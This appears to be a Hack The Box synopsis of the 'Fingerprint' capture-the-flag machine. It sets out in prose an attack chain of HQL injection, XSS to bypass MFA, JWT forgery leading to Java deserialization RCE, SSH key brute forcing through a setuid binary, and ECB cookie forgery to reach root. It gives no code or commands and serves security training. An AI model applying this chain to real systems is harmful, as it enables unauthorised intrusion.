HTB CDSA
Certified Defensive Security Analyst by Academy. Get started now!
Machine Synopsis
Fingerprint is an insane difficulty Linux machine which mainly focuses on web-based vulnerabilities such as HQL injection, Cross-Site Scripting and Java deserialization (with a custom gadget chain), with some additional focus on cryptography. Initial foothold requires the concatenation of multiple steps, involving two separate web applications: HQL injection and XSS are exploited to bypass multi-factor authentication and gain access to a page where serialized Java data can be uploaded; path traversal is used to read Flask source code and obtain the application secret, which can be used to forge malicious JWT tokens and trigger deserialization of the uploaded data, leading to remote code execution. Lateral movement is possible due to a setuid binary that matches regular expressions on files, allowing to brute force the private SSH key of the user. Finally, privileges are escalated by accessing a local development version of the initial web application (still vulnerable to arbitrary file read via directory traversal) with added cookie cryptography. The insecure ECB mode is used, which allows attackers to forge an administrative cookie, gaining access to the vulnerable page where `root`'s private key file can be read, and ultimately resulting in an interactive shell with `root` privileges.
Machine Matrix